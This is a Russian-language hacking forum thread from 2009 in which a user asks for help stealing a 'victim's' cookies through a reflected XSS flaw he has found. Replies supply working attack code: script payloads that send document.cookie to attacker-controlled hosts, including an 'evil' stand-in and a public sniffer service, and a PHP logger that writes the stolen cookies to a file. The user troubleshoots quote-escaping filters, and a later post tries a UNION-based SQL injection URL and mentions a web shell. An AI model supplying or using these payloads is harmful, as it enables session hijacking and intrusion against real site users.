Ваши вопросы по уязвимостям.

21.11.2009, 11:03

xofffff

Познающий

Регистрация: 16.11.2009

Сообщений: 38

С нами: 8677074

Репутация: 15

Я знаю вы поможете мне вы умные все )

Я нашел xss и пытаюсь сделать ссылку для того что бы послать ее жертве

вот примерно такая

Код:

?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> <

На моем сайте уже залита картинка 1x1px и находится по адресу http://site.ru/kartinka.gif

Пробую сам переходить по этой ссылки скрипт вроде работает а вот я не знаю куда cookies сохранились или должна быть специальная картинка 1x1px у меня она прозрачная gif.

Помогите реализовать мои коварные планы

𝕏 Twitter Reddit Telegram Копировать ссылку

21.11.2009, 11:10

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

С нами: 9410786

Репутация: 2731

Цитата:

Сообщение от xofffff

Код:

?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> <

Это должна быть не просто картинка, а PHP-скрипт, который записывает переданные ему данные куда - либо.

21.11.2009, 11:11

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

С нами: 9154406

Репутация: 2221

Цитата:

Сообщение от xofffff

Код:

?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> <

Вообще если XSS Пассивная, то лучше юзать <script src=http://evil/evilscript.js>cookie()</script>

PHP код:


		
			
function cookie(){

window.location="cookie.php?data="+document.cookie;

}

в cookie.php

PHP код:


		
			
<?PHP

$file=fopen('cookie.txt', 'A+');

fwrite($file, $_GET['data']);

fclose($file);

?>

ps
Файл cookie.txt должны быть разрешены для записи.

21.11.2009, 11:19

xofffff

Познающий

Регистрация: 16.11.2009

Сообщений: 38

С нами: 8677074

Репутация: 15

Цитата:

Сообщение от Ctacok

Вообще если XSS Пассивная, то лучше юзать <script src=http://evil/evilscript.js>cookie()</script>

PHP код:


		
			
function cookie(){

window.location="cookie.php?data="+document.cookie;

}

в cookie.php

PHP код:


		
			
<?PHP

$file=fopen('cookie.txt', 'A+');

fwrite($file, $_GET['data']);

fclose($file);

?>

ps
Файл cookie.txt должны быть разрешены для записи.

Сделал как ты сказал провери файл cookie.txt он пустой

посмотрел исходный код нашел место куда записался скрипт вот что там

PHP код:


		
			
<input type='text' maxlength='100' size='14' class='text' id='username' name='username' value='\'><script src=http://site.ru/js.js>cookie()</script> <'>&nbsp;<br><br>

21.11.2009, 11:16

YuNi|[c

Участник форума

Регистрация: 17.09.2006

Сообщений: 248

С нами: 10340793

Репутация: 66

Цитата:

Сообщение от xofffff

Код:

?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> <

Я думаю тебе надо регатся на тут,нажимаеш завести ID регаешся и
изменят на твоем запросе эту часть так:

Цитата:

потом куки найдеш тута наберив твой ид и пасс

21.11.2009, 11:23

xofffff

Познающий

Регистрация: 16.11.2009

Сообщений: 38

С нами: 8677074

Репутация: 15

Цитата:

Сообщение от YuNi|[c

Я думаю тебе надо регатся на тут,нажимаеш завести ID регаешся и
изменят на твоем запросе эту часть так:

потом куки найдеш тута наберив твой ид и пасс

Сделал как ты сказал но поставился фильтр

Код:

<script>img=new Image(); img.src=\"http://web-defence.ru/snif/s.gif?id=850'>

тут если " идет то он перед ней ставит \

21.11.2009, 11:32

xofffff

Познающий

Регистрация: 16.11.2009

Сообщений: 38

С нами: 8677074

Репутация: 15

Есть у кого еще какие нибудь предложения по самой простой теме

Цитата:

Я знаю вы поможете мне вы умные все ) Я нашел xss и пытаюсь сделать ссылку для того что бы послать ее жертве вот примерно такая

Код:

?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> <

На моем сайте уже залита картинка 1x1px и находится по адресу http://site.ru/kartinka.gif Пробую сам переходить по этой ссылки скрипт вроде работает а вот я не знаю куда cookies сохранились или должна быть специальная картинка 1x1px у меня она прозрачная gif. Помогите реализовать мои коварные планы

Добавление: Если в запросе писать " то перед " он ставит знак \ из за этого способ YuNi|[c не работает так как там код c "

Код:

<script>img=new Image(); img.src="http://web-defence.ru/snif/s.gif?id=850'><

Пробовал без " все равно лог не пришел не какой.

Способ от Ctacok'a сделал все как он сказал но в cookie.txt не что не сохранилось права стоят 777

Добавление:
Пробовал кодировать что бы обойти фильтр но лог так и не пришел

Последний раз редактировалось xofffff; 21.11.2009 в 11:39..

21.11.2009, 11:43

YuNi|[c

Участник форума

Регистрация: 17.09.2006

Сообщений: 248

С нами: 10340793

Репутация: 66

без " твой запрос не будеть правильным, но если кавычки фильтруется тогда незнаю, у меня норм работает через веб дефенс

21.11.2009, 12:17

B1t.exe

Постоянный

Регистрация: 06.11.2006

Сообщений: 865

С нами: 10268804

Репутация: 208

l1ght
выполнил это(http://www.site.ru/vn84.php?id=-1+union+select+*+from+(select+*+from+admin+join+ad min+a+join+admin+b)c--+1). как не удивительно, но открылся страница по продукциям и докумнетаниями этого конторы. можно считать, что ваш запрос ничего не выдал, если не считать, что не понятные цифры появились на странице (со странным названием страницы: opinions, хотя там документации и дистрибутив находится):

gisTy

Спасибо за разяснение. А эта информация в данным ситуации нужен? Или это как определись платформу удаленного жертвы?

Ctacok

Не очень понал...

Цитата:

Найди полный путь.

можно тут подробнее ? Не понимаю о каком пути идет речь.. (может там надо написать путь своего веб шелла?)